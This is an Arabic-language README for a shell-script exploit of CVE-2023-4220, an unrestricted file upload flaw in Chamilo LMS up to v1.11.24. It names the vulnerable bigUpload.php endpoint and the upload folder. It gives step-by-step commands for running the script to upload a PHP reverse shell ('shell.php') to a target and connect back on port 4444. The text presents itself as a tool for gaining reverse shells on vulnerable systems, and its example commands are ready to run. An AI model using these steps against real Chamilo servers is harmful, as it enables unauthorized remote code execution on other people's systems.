
استغلال قائم على Shell لـ CVE-2023-4220 يستهدف رفع الملفات غير المقيد في Chamilo LMS. يقوم برفع ملفات عشوائية لتنفيذ reverse shells على الأنظمة الضعيفة.
يُظهر هذا الاستغلال ثغرة رفع ملفات غير مقيدة في Chamilo-LMS. تؤثر الثغرة على وظيفة رفع الملفات الكبيرة الموجودة في:
/main/inc/lib/javascript/bigupload/inc/bigUpload.php
الإصدارات المتأثرة: Chamilo LMS <= v1.11.24
تسمح الثغرة برفع ملفات عشوائية إلى:
/main/inc/lib/javascript/bigupload/files/
أولاً، اجعل الاستغلال قابلاً للتنفيذ وعرض معلومات الاستخدام:
chmod +x CVE-2023-4220.sh
./CVE-2023-4220.sh
قم بتشغيل الاستغلال مع المعاملات المطلوبة:
./CVE-2023-4220.sh -f reverse_file -h host_link -p port_in_the_reverse_file
تحقق من الملف الذي تم رفعه في:
http://target.test/main/inc/lib/javascript/bigupload/files/
-f: تحديد الملف المراد رفعه-h: رابط الهدف (URL)-p: رقم المنفذ للاتصال./CVE-2023-4220.sh -f shell.php -h http://target.test -p 4444
توجد الثغرة في آلية رفع الملفات في Chamilo LMS التي تفشل في التحقق بشكل صحيح من الملفات المرفوعة في وظيفة رفع الملفات الكبيرة.
/main/inc/lib/javascript/bigupload/inc/bigUpload.php
/main/inc/lib/javascript/bigupload/files/